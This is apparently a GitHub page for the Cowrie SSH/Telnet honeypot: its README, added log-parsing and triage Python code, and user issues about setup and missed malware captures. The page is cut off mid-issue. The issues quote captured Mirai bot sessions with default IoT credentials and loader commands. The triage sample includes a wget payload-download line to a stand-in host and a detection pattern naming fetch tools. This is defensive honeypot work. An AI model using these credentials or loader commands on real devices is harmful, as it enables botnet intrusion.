Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io

Overview

Cowrie


Welcome to the Cowrie GitHub repository

This is the official repository for the Cowrie SSH and Telnet Honeypot effort.

What is Cowrie

Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python; in high interaction mode (proxy) it functions as an SSH and Telnet proxy that forwards the attacker to another system and observes their behavior there.

Cowrie is maintained by Michel Oosterhof.

Documentation

The documentation can be found here.

Slack

You can join the Cowrie community at the following Slack workspace.

Features

  • Choose to run as an emulated shell (default):
    • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
    • Possibility of adding fake file contents so the attacker can cat files such as /etc/passwd. Only minimal file contents are included
    • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection
  • Or proxy SSH and telnet to another system
    • Run as a pure telnet and ssh proxy with monitoring
    • Or let Cowrie manage a pool of Qemu emulated servers to provide the systems to login to

For both settings:

  • Session logs are stored in a UML-compatible format for easy replay with the bin/playlog utility.
  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Forward SMTP connections to SMTP Honeypot (e.g. mailoney)
  • JSON logging for easy processing in log management solutions
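As an added example (not code from the Cowrie project), here is a minimal writer and parser for the binary TTY session log records that bin/playlog replays. The record layout used below, a little-endian `<iLiiLL` header of op, tty, length, direction, seconds and microseconds followed by the payload of write records, together with the op and direction constants, is an assumption based on the Kippo-derived format; check it against the project's ttylog module before relying on it. The parser bounds-checks every length field so that a truncated or corrupted log raises instead of reading past the buffer.

```python
import struct
from typing import List, Tuple

# ASSUMPTION: Kippo/Cowrie ttylog record header = op, tty, length, direction, sec, usec
# packed little-endian as int32, uint32, int32, int32, uint32, uint32; a write record
# is followed by `length` bytes of terminal data.
HEADER = struct.Struct("<iLiiLL")
OP_OPEN, OP_CLOSE, OP_WRITE, OP_EXEC = 1, 2, 3, 4
TYPE_INPUT, TYPE_OUTPUT, TYPE_INTERACT = 1, 2, 3

Record = Tuple[int, int, float, bytes]  # (op, direction, timestamp, data)


def _split_stamp(stamp: float) -> Tuple[int, int]:
    sec = int(stamp)
    return sec, int(1_000_000 * (stamp - sec))


def open_record(stamp: float) -> bytes:
    return HEADER.pack(OP_OPEN, 0, 0, 0, *_split_stamp(stamp))


def write_record(direction: int, stamp: float, data: bytes) -> bytes:
    return HEADER.pack(OP_WRITE, 0, len(data), direction, *_split_stamp(stamp)) + data


def close_record(stamp: float) -> bytes:
    return HEADER.pack(OP_CLOSE, 0, 0, 0, *_split_stamp(stamp))


def parse_ttylog(blob: bytes) -> List[Record]:
    """Decode a whole ttylog file. Every length field is checked against the buffer
    so a truncated or corrupted file raises instead of reading past the end."""
    records: List[Record] = []
    pos = 0
    while pos + HEADER.size <= len(blob):
        op, _tty, length, direction, sec, usec = HEADER.unpack_from(blob, pos)
        pos += HEADER.size
        data = b""
        if op == OP_WRITE:
            if length < 0 or pos + length > len(blob):
                raise ValueError(f"truncated write record at offset {pos - HEADER.size}")
            data = blob[pos:pos + length]
            pos += length
        records.append((op, direction, sec + usec / 1_000_000, data))
    if pos != len(blob):
        raise ValueError(f"{len(blob) - pos} trailing bytes after last record")
    return records


def attacker_input(records: List[Record]) -> bytes:
    """Concatenate only what the client typed; output records carry the honeypot's replies."""
    return b"".join(d for op, direction, _ts, d in records
                    if op == OP_WRITE and direction == TYPE_INPUT)


def sample_session() -> bytes:
    """Constructed two-way session, not a real capture."""
    t = 1484584382.25
    return (open_record(t)
            + write_record(TYPE_OUTPUT, t + 0.1, b"login: ")
            + write_record(TYPE_INPUT, t + 1.0, b"root\r\n")
            + write_record(TYPE_OUTPUT, t + 1.1, b"Password: ")
            + write_record(TYPE_INPUT, t + 2.0, b"anko\r\n")
            + close_record(t + 3.0))


if __name__ == "__main__":
    recs = parse_ttylog(sample_session())
    for op, direction, ts, data in recs:
        print(f"{ts:.6f} op={op} dir={direction} {data!r}")
    print("typed:", attacker_input(recs))
```

Separating input from output records is what makes a replay useful for triage: the input stream is the attacker's actual keystrokes, while the output stream is only what the emulated shell chose to answer.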

Docker

Docker versions are available.

Requirements

Software required:

  • Python 3.6+
  • python-virtualenv

For Python dependencies, see requirements.txt.

Files of interest:

  • etc/cowrie.cfg - Cowrie's configuration file. Default values can be found in etc/cowrie.cfg.dist.
  • share/cowrie/fs.pickle - fake filesystem
  • etc/userdb.txt - credentials to access the honeypot
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here or use bin/fsctl
  • honeyfs/etc/issue.net - pre-login banner
  • honeyfs/etc/motd - post-login banner
  • var/log/cowrie/cowrie.json - transaction output in JSON format
  • var/log/cowrie/cowrie.log - log/debug output
  • var/lib/cowrie/tty/ - session logs, replayable with the bin/playlog utility.
  • var/lib/cowrie/downloads/ - files transferred from the attacker to the honeypot are stored here
  • share/cowrie/txtcmds/ - file contents for simple fake commands
  • bin/createfs - used to create the fake filesystem
  • bin/playlog - utility to replay session logs

Data Sharing

Cowrie will by default upload data on crashes and Python exceptions to api.cowrie.org. This information is used to improve the honeypot and is not shared with third parties. It can be disabled by setting enabled=false in [output_crashreporter].

Contributors

Many people have contributed to Cowrie over the years. Special thanks to:

  • Upi Tamminen (desaster) for all his work developing Kippo on which Cowrie was based
  • Dave Germiquet (davegermiquet) for TFTP support, unit tests, new process handling
  • Olivier Bilodeau (obilodeau) for Telnet support
  • Ivan Korolev (fe7ch) for many improvements over the years.
  • Florian Pelgrim (craneworks) for his work on code cleanup and Docker.
  • Guilherme Borges (sgtpepperpt) for SSH and telnet proxy (GSoC 2019)
  • And many many others.
Comments
  • Setting up ELK to work with Cowrie

    Hello folks,

    I'd like to use Kibana to visualize the events in the Cowrie log and have been failing so far. Yes, I have read this article and also issue #402, as well as the documentation.

    To begin with, my setup is fairly simple - just one Cowrie honeypot and ELK installed on the same machine (and supposed to be used on the same machine). So, I don't need Filebeat to ship logs to another machine, correct? Also, I gather from issue #402 that I no longer need an nginx server like the first article mentioned above says, yes?

    So far I've done the following:

    1. Installed elasticsearch, logstash and kibana on the same virtual machine where Cowrie is.
    2. Created /var/log/kibana and modified /etc/kibana/kibana.yml according to the documentation.
    3. Downloaded the GeoIP data and put it in /var/opt/logstash/vendor/geoip/.
    4. Copied cowrie/doc/elk/logstash-cowrie.conf to /etc/logstash/conf.d/ after modifying some paths to make sure they reflect my environment.
    5. Started the service logstash.

    However, the file /tmp/cowrie-logstash.log is not created. What am I missing? Do I need to change some ownerships - e.g., stuff in /etc/logstash/ is currently owned by root.

    Also, does this mean that with this setup Kibana can visualize only one day's worth of data? The file cowrie.json gets renamed after midnight and a new one is created.

    question 
    opened by bontchev 77
  • Not capturing any Mirai samples

    I ran a pretty much out-of-the-box Cowrie installation on a virtual machine for a couple of hours. Although the logs show that various Mirai variants have hit 127 times, to my amazement not even a single sample was captured. Going through the logs, I can identify the following cases:

    1. In the vast majority of cases the capturing has failed because of this issue. The discussion of the issue suggests that a hotfix for the problem is available - could we get it merged to master, please?

    2. The second case looks like pretty much a standard Mirai; I do not understand what exactly is failing. It seems to me that the honeypot is providing the right answers. Here is a sample session from the logs:

    2017-01-16T18:32:58+0200 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 109.236.92.144:55305 (192.168.0.104:23) [session: TT10]
    2017-01-16T18:33:01+0200 [CowrieTelnetTransport,10,109.236.92.144] login attempt [root/anko] succeeded
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Opening TTY Log: log/tty/20170116-183302-None-10i.log
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: enable
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: enable 
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Reading txtcmd from "txtcmds/bin/enable"
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: shell
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command not found: shell
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: sh
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: sh 
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ps; /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ps
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: ps
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cat /proc/mounts
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cat /proc/mounts
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: echo -e '\x6b\x61\x6d\x69/dev'
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cat /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cat /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox rm /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: rm /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: cd /
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cd /
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cp /bin/echo dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cp /bin/echo dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cp /bin/echo dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: > dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox chmod 777 /dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: chmod 777 /dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cat /bin/echo
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cat /bin/echo
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cat /bin/echo
    2017-01-16T18:33:03+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
    2017-01-16T18:33:03+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] Closing TTY Log: log/tty/20170116-183302-None-10i.log after 121 seconds
    2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionDone'>: Connection was closed cleanly.
    2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] Connection lost after 126 seconds
    
    3. The third case is completely weird; it seems that the bot is sending commands containing '0x00' characters? Here is a sample session log:

    2017-01-16T18:32:34+0200 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 122.224.33.171:31513 (192.168.0.104:23) [session: TT8]
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] login attempt [root/888888] succeeded
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] Opening TTY Log: log/tty/20170116-183236-None-8i.log
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] Warning: state changed and new state returned
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: enable
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Command found: enable 
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Reading txtcmd from "txtcmds/bin/enable"
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: system
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Command not found: system
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: shell
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Command not found: shell
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: sh
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] Command found: sh 
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: /bin/busybox MIRAI
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] Command found: /bin/busybox MIRAI
    2017-01-16T18:32:39+0200 [CowrieTelnetTransport,8,122.224.33.171] Closing TTY Log: log/tty/20170116-183236-None-8i.log after 2 seconds
    2017-01-16T18:32:39+0200 [CowrieTelnetTransport,8,122.224.33.171] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionDone'>: Connection was closed cleanly.
    2017-01-16T18:32:39+0200 [CowrieTelnetTransport,8,122.224.33.171] Connection lost after 4 seconds
    
    opened by bontchev 30
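Added example, not part of the issue above and not Cowrie's own code: a small parser that rebuilds Telnet sessions from cowrie.log lines in the format printed above and reports, per session, the credentials that worked, the busybox probe tokens (ECCHI, MIRAI and the like), the commands the emulated shell did not know, and whether the session ever issued a download command, which is the first thing to check when no samples are being captured. The regexes are assumptions about the log format as it appears above, not the project's parsing; the sample lines are constructed from the session quoted above plus a second invented session from a documentation-range address.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# cowrie.log line as shown in the issue: "<timestamp> [<source>] <message>"
LINE_RE = re.compile(r"^(?P<ts>\S+) \[(?P<src>[^\]]+)\] (?P<msg>.*)$")
NEWCONN_RE = re.compile(r"New connection: (?P<ip>[\d.]+):\d+ .*\[session: [A-Za-z]+(?P<num>\d+)\]")
# per-session lines carry the source "<Transport>,<session number>,<source ip>"
SESSION_SRC_RE = re.compile(r"^\w+,(?P<num>\d+),(?P<ip>[\d.]+)$")
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/]*)/(?P<pw>[^\]]*)\] (?P<res>succeeded|failed)")
LOST_RE = re.compile(r"Connection lost after (?P<secs>\d+) seconds")
# Mirai-family loaders probe the shell with "/bin/busybox <UPPERCASE TOKEN>" and key on
# the "applet not found" reply; the token differs per variant.
PROBE_RE = re.compile(r"/bin/busybox ([A-Z]{4,})\b")
# the download stage of such a session normally uses one of these fetchers
FETCH_RE = re.compile(r"\b(wget|tftp|curl|ftpget)\b")

SessionKey = Tuple[str, int]


@dataclass
class Session:
    ip: str
    num: int
    logins: List[Tuple[str, str, bool]] = field(default_factory=list)
    commands: List[str] = field(default_factory=list)
    not_found: List[str] = field(default_factory=list)
    probes: Set[str] = field(default_factory=set)
    duration: Optional[int] = None


def parse_sessions(lines) -> Dict[SessionKey, Session]:
    sessions: Dict[SessionKey, Session] = {}
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if not m:
            continue
        src, msg = m["src"], m["msg"]
        nc = NEWCONN_RE.search(msg)
        if nc:
            key = (nc["ip"], int(nc["num"]))
            sessions[key] = Session(*key)
            continue
        s = SESSION_SRC_RE.match(src)
        if not s:
            continue
        key = (s["ip"], int(s["num"]))
        sess = sessions.setdefault(key, Session(*key))
        lm = LOGIN_RE.search(msg)
        lost = LOST_RE.search(msg)
        if lm:
            sess.logins.append((lm["user"], lm["pw"], lm["res"] == "succeeded"))
        elif msg.startswith("CMD: "):
            cmd = msg[len("CMD: "):]
            sess.commands.append(cmd)
            sess.probes.update(PROBE_RE.findall(cmd))
        elif msg.startswith("Command not found: "):
            sess.not_found.append(msg[len("Command not found: "):])
        elif lost:
            sess.duration = int(lost["secs"])
    return sessions


def triage(sessions: Dict[SessionKey, Session]) -> List[dict]:
    """One finding per session that showed a busybox probe."""
    findings = []
    for sess in sessions.values():
        if not sess.probes:
            continue
        findings.append({
            "src_ip": sess.ip,
            "session": sess.num,
            "credentials": [f"{u}/{p}" for u, p, ok in sess.logins if ok],
            "probe_tokens": sorted(sess.probes),
            "unsupported_commands": sess.not_found,
            "reached_download_stage": any(FETCH_RE.search(c) for c in sess.commands),
            "duration_s": sess.duration,
        })
    return findings


# Constructed sample: session 10 is trimmed from the issue above, session 11 is invented.
SAMPLE_LOG = """\
2017-01-16T18:32:58+0200 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 109.236.92.144:55305 (192.168.0.104:23) [session: TT10]
2017-01-16T18:33:01+0200 [CowrieTelnetTransport,10,109.236.92.144] login attempt [root/anko] succeeded
2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: enable
2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: shell
2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command not found: shell
2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: sh
2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] Connection lost after 126 seconds
2017-01-16T18:40:00+0200 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 198.51.100.7:40001 (192.168.0.104:23) [session: TT11]
2017-01-16T18:40:01+0200 [CowrieTelnetTransport,11,198.51.100.7] login attempt [admin/admin] failed
2017-01-16T18:40:02+0200 [CowrieTelnetTransport,11,198.51.100.7] login attempt [root/888888] succeeded
2017-01-16T18:40:03+0200 [CowrieTelnetTransport,11,198.51.100.7] CMD: /bin/busybox MIRAI
2017-01-16T18:40:04+0200 [CowrieTelnetTransport,11,198.51.100.7] CMD: cd /tmp; /bin/busybox wget http://example.invalid/dvrHelper; /bin/busybox MIRAI
2017-01-16T18:40:09+0200 [CowrieTelnetTransport,11,198.51.100.7] Connection lost after 9 seconds
"""

if __name__ == "__main__":
    for finding in triage(parse_sessions(SAMPLE_LOG.splitlines())):
        print(finding)
```

A session that shows a probe token but never reaches the download stage (like session 10 above) points at the emulated shell's replies rather than at the download path, so the `unsupported_commands` list is where to look first; a session that does reach a fetch command but still leaves nothing in var/lib/cowrie/downloads points at the download handling instead.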
  • Logging in a MySQL database

    Hello folks,

    Elasticsearch crapped very badly on me and I had to rebuild the whole database from scratch, so I don't trust it any more. Unfortunately, Kibana depends on it, which means that if I scrap it, I won't be able to use Kibana for visualizations. However, a colleague told me that he could very easily make the visualizations I currently use if the data is in a MySQL database. So, I am now trying to make Cowrie save its data in such a database. Unfortunately, I am also failing miserably, so I could use your help.

    To begin with, I followed this guide. It's from a couple of years ago, but it seems mostly actual, because everything worked - the database was created with the corresponding tables and structure. I have modified the [output_mysql] section in cowrie.cfg accordingly, to specify the host containing the database, user name, password, etc. I used a stand-alone Python script to check that I can indeed connect to the database from the machine on which Cowrie is running and do some trivial stuff, like getting the MySQL version.

    Unfortunately, when I start Cowrie, I get the error message

    'Failed to load output engine: mysql due to ImportError: No module named MySQLdb'

    Now, the module mysql-python is installed - I installed it while following the guide mentioned above. But it wasn't installed (yet) when I installed Cowrie, months ago. I guess that means it isn't installed in the virtual environment cowrie-env? How do I install it there? (I was hoping that the virtual environment would see modules that are globally installed on the system, but I guess it doesn't.) I hope I don't need to scrap the whole Cowrie installation and re-install it from scratch?

    opened by bontchev 27
  • I have gone through all steps for cowrie honeypot but got this error after ./start.sh

    These errors were displayed:

    Starting cowrie with extra arguments [] ...
    Unhandled Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 579, in parseOptions
        usage.Options.parseOptions(self, options)
      File "/usr/lib/python2.7/dist-packages/twisted/python/usage.py", line 262, in parseOptions
        for (cmd, short, parser, doc) in self.subCommands:
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 596, in subCommands
        for plug in sorted(plugins, key=attrgetter('tapname')):
      File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 213, in getPlugins
        allDropins = getCache(package)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 171, in getCache
        provider = pluginModule.load()
      File "/usr/lib/python2.7/dist-packages/twisted/python/modules.py", line 389, in load
        return self.pathEntry.pythonPath.moduleLoader(self.name)
      File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 303, in namedAny
        topLevelPackage = _importAndCheckStack(trialname)
      File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 250, in _importAndCheckStack
        reraise(excValue, excTraceback)
      File "/home/cowrie/cowrie/twisted/plugins/cowrie_plugin.py", line 46, in <module>
        from cowrie.core.config import readConfigFile
      File "/home/cowrie/cowrie/cowrie/core/config.py", line 8, in <module>
        import configparser
    exceptions.ImportError: No module named configparser

    Unhandled Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/python/usage.py", line 447, in __str__
        return self.getSynopsis() + '\n' + self.getUsage(width=None)
      File "/usr/lib/python2.7/dist-packages/twisted/python/usage.py", line 483, in getUsage
        for (cmd, short, parser, desc) in self.subCommands:
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 596, in subCommands
        for plug in sorted(plugins, key=attrgetter('tapname')):
      File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 213, in getPlugins
        allDropins = getCache(package)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 171, in getCache
        provider = pluginModule.load()
      File "/usr/lib/python2.7/dist-packages/twisted/python/modules.py", line 389, in load
        return self.pathEntry.pythonPath.moduleLoader(self.name)
      File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 303, in namedAny
        topLevelPackage = _importAndCheckStack(trialname)
      File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 250, in _importAndCheckStack
        reraise(excValue, excTraceback)
      File "/home/cowrie/cowrie/twisted/plugins/cowrie_plugin.py", line 46, in <module>
        from cowrie.core.config import readConfigFile
      File "/home/cowrie/cowrie/cowrie/core/config.py", line 8, in <module>
        import configparser
    exceptions.ImportError: No module named configparser

    Usage: twistd [options]
    Options:
          --savestats      save the Stats object rather than the text output of the profiler.
      -o, --no_save        do not save state on shutdown
      -e, --encrypted      The specified tap/aos file is encrypted.
      -n, --nodaemon       don't daemonize, don't use default umask of 0077
          --originalname   Don't try to change the process name
          --syslog         Log to syslog, not to file
          --euid           Set only effective user-id rather than real user-id. (This option has no effect unless the server is running as root, in which case it means not to shed all privileges after binding ports, retaining the option to regain privileges in cases such as spawning processes. Use with caution.)
      -l, --logfile=       log to a specified file, - for stdout
          --logger=        A fully-qualified name to a log observer factory to use for the initial log observer. Takes precedence over --logfile and --syslog (when available).
      -p, --profile=       Run in profile mode, dumping results to specified file.
          --profiler=      Name of the profiler to use (profile, cprofile). [default: cprofile]
      -f, --file=          read the given .tap file [default: twistd.tap]
      -y, --python=        read an application from within a Python file (implies -o)
      -s, --source=        Read an application from a .tas file (AOT format).
      -d, --rundir=        Change to a supplied directory before running [default: .]
          --prefix=        use the given prefix when syslogging [default: twisted]
          --pidfile=       Name of the pidfile [default: twistd.pid]
          --chroot=        Chroot to a supplied directory before running
      -u, --uid=           The uid to run as.
      -g, --gid=           The gid to run as.
          --umask=         The (octal) file creation mask to apply.
          --help-reactors  Display a list of possibly available reactor names.
          --version        Print version information and exit.
          --spew           Print an insanely verbose log of everything that happens. Useful when debugging freezes or locks in complex code.
      -b, --debug          Run the application in the Python Debugger (implies nodaemon), sending SIGUSR2 will drop into debugger
      -r, --reactor=       Which reactor to use (see --help-reactors for a list of possibilities)
          --help           Display this help and exit.

    twistd reads a twisted.application.service.Application out of a file and runs it.
    Commands:
        conch          A Conch SSH service.
        dns            A domain name server.
        ftp            An FTP server.
        inetd          An inetd(8) replacement.
        mail           An email service
        manhole        An interactive remote debugger service accessible via telnet and ssh and providing syntax coloring and basic line editing functionality.
        manhole-old    An interactive remote debugger service.
        news           A news server.
        portforward    A simple port-forwarder.
        procmon        A process watchdog / supervisor
        socks          A SOCKSv4 proxy service.
        telnet         A simple, telnet-based remote debugging service.
        web            A general-purpose web server which can serve from a filesystem or application resource.
        words          A modern words server
        xmpp-router    An XMPP Router server

    question 
    opened by rereee 26
  • output_mysql not sending data

    In the database, only table `sessions` has much data; the other tables such as `auth`, `clients`, `input`, `ttylog` have no data. And `log/cowrie.log` and `log/cowrie.json` have become binary files... What's the matter?... Here are the screenshots:

    ![zj1 qzbl r0g 4lj a qb](https://cloud.githubusercontent.com/assets/17915615/19677173/9e3e8ea6-9aca-11e6-9c18-53d88e7605e2.png)
    ![ut1 5_7k 7qrggv4b7pdith](https://cloud.githubusercontent.com/assets/17915615/19677209/c6d128e2-9aca-11e6-9e2e-e5f2b20fadf8.png)
    ![9tl8 i r pn80bh 1j olr](https://cloud.githubusercontent.com/assets/17915615/19677228/dbc4b962-9aca-11e6-8fec-573ca4a6df38.png)
    ![ceppb dwca w r4 if 4 d](https://cloud.githubusercontent.com/assets/17915615/19677240/eec24a34-9aca-11e6-9c1f-5eba6fedd259.png)
    ![cllo45bi hr n14ysdsw_vi](https://cloud.githubusercontent.com/assets/17915615/19677266/0d140bda-9acb-11e6-8503-ebc1fc94d3a2.png)
    ![gsz g 6 04mj5vp0u n](https://cloud.githubusercontent.com/assets/17915615/19677314/4be3439e-9acb-11e6-8c03-d4bd6132f799.png)

    In table `sensors`, the ip is my server ip...

    bug 
    opened by NitroCao 26
  • Cowrie writes to MySQL in local time zone

    I know that when Cowrie produces a JSON log, the timestamps there are in UTC. But how are they stored in a MySQL database?

    I'm asking because I hit some rather bizarre problem. I'm trying to make a simple graph of the number of login attempts for every hour using Grafana as the visualizer. The graph looks fine but the time (the X-axis) is shifted by 3 hours.

    My local time zone is UTC+3 right now (GMT+2 geographically, plus 1 hour daylight savings). Grafana is configured to display times in the local time zone of the viewer. One explanation for the mismatch could be that the data itself is wrong - i.e., is stored in local time in the database, instead of in UTC.

    The problem is, I can't figure out exactly what is happening. Cowrie writes the data to the database using the STR_TO_DATE() MySQL function, which takes two arguments - the date itself (presumably in UTC, because it's the same thing that's written to the JSON log?) and a format string, which is set to '%Y-%m-%dT%H:%i:%s.%fZ'. Doesn't this mean that the timestamp ought to go as an UTC timestamp in the database? Besides, I've read somewhere that timestamp data is stored always as UTC timestamps by MySQL. Assuming that the time zone of my MySQL server is set to UTC+3, wouldn't that mean that an unnecessary conversion is made and 3 hours are subtracted from the timestamp?

    Maybe Cowrie should set the time zone of its MySQL connection to UTC+0? Like

    SET time_zone='+00:00';

    bug 
    opened by bontchev 22
  • Problem in ./start.sh exceptions.AttributeError: 'module' object has no attribute 'IPluggableAuthenticationModules'

    I have an error in start.sh (I'm on Ubuntu 14.04):

    (envirt)[email protected]:~/kippo/kippo-master$ ./start.sh
    twistd (the Twisted daemon) 16.0.0
    Copyright (c) 2001-2016 Twisted Matrix Laboratories.
    See LICENSE for details.
    Starting kippo in the background...
    Unhandled Error
    Traceback (most recent call last):
